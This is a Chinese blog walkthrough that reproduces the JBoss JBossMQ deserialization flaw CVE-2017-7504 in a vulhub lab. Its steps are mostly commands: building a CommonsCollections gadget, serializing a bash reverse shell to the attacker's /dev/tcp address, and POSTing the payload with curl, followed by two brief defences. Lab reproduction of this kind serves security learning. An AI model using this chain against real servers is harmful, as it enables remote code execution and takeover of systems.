JBoss 4.x JBossMQ JMS反序列化(CVE-2017-7504)

最新推荐文章于 2024-08-17 13:00:00 发布
最新推荐文章于 2024-08-17 13:00:00 发布
阅读量908 收藏
点赞数
分类专栏: # 漏洞复现 文章标签: Jboss jboss反序列化漏洞 jboss4.x 反序列化漏洞
学习之路长且漫,长情与君总会见!
本文链接:https://blog.csdn.net/Aaron_Miller/article/details/106618062
版权

文章目录

一、漏洞介绍

1.1 漏洞简介

  JBoss是一个基于J2EE的开放源代码应用服务器,用户占有量较大,JBoss实现过程的JMS over HTTP Invocation Layer的HttpServerILServlet.java文件存在反序列化漏洞。

1.2 影响版本

  • JBoss<4.x

1.3 利用路径

/jbossmq-httpil/HTTPServerILServlet
在这里插入图片描述

1.4 全球统计

在这里插入图片描述

二、环境搭建

  • 受害者IP:192.168.159.129(vulhub)
  • 攻击者IP:192.168.159.128(kali)

》》启动Jbos AS 4.0.5
在这里插入图片描述》》访问web站点
在这里插入图片描述

三、操作过程

》》使用JavaDeserH2HC工具
》》使用Gadget:ExampleCommonsCollections1WithHashMap编译生成序列化数据

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

在这里插入图片描述
》》序列化恶意数据到文件(bash反弹shell)

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.159.128/19111 0>&1"

在这里插入图片描述
》》nc开启shell监听
在这里插入图片描述
》》以二进制的方式POST发送数据到目标站点

curl http://192.168.159.129:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

在这里插入图片描述
》》成功收到shell
在这里插入图片描述

四、防御措施

  1. 将JBoss版本升级到最新
  2. 尽量不要将JBoss映射到公网
風月长情
关注
专栏目录
网安漏洞复现系列:漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
weixin_54626591的博客
05-06 219
漏洞复现之JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504
不忘初心,护天下安全!
09-18 607
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。JBoss AS 4.x及之前版本。成功利用漏洞执行命令。
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504
最新发布
A_991128a的博客
08-17 672
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)复现
KaNongDD的博客
09-18 1410
前言 写这篇文章是因为,现在CSDN环境太恶心人了,全是水文章或者收费文章。完全没几个是自己亲自去复现的。 准备工作(实在不懂了加我微信问我:14777115517,但还是希望你们先动手弄) 需要的工具链接: https://pan.baidu.com/s/1BmDo1vYX6DTZeI8wcnxFZQ 提取码:4bzf 该漏洞出现在/jbossmq-httpil/HTTPServerILServlet请求中,利用ysoserial的eCommonsCollections5利用链。 必看:.
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2608
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
CVE-2017-7504JBoss 4.x JBossMQ JMS 反序列化漏洞
weixin_45253622的博客
12-09 733
JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504) vulhub官方复现:https://vulhub.org/#/environments/jboss/CVE-2017-7504/ 漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ 实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java
中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-12149)
网络安全领域___专研者.
11-28 698
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具,方便我们进行漏洞利用getshell。
JBoss4中JMS的使用(一)
岁寒三友的专栏
11-19 6032
在现在的项目中分布式程序越来越多,SOA的架构下,各种服务相互调用都是以消息来传递的,所以JMS作为java的消息机制因该要很好的掌握一下,当然像web services之间并不是直接调用JMS的API。本文主要是讲JMS的在JBoss4中的具体使用,JBoss中的JMS的实现叫JBossMQ,关于其理论方面很多文章都有讲,google一下就有了,所以这里就不重复了。至于像在weblogic,
jboss/CVE-2017-7504
不知名白帽的博客
06-23 2150
jboss/CVE-2017-7504漏洞复现。
CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现
Jerry____的博客
12-16 1981
CVE-2017-7504 (JBOSS反序列化漏洞)漏洞复现 一:漏洞原理 JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二:影响范围 JBoss AS 4.x及之前版本。 三:环境搭建 cd...
[Vulfocus解题系列] jboss 反序列化CVE-2017-7504
00勇士王子的博客
07-11 1130
漏洞介绍 名称: jboss 反序列化CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
vulhub之jboss(CVE-2017-7504)
weixin_56306210的博客
05-07 560
vulhub之jboss(CVE-2017-7504)
jboss CVE-2017-7504 如何修复
11-03
JBoss AS 4.x及之前版本中,JbossMQ实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。修复该漏洞的方法如下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值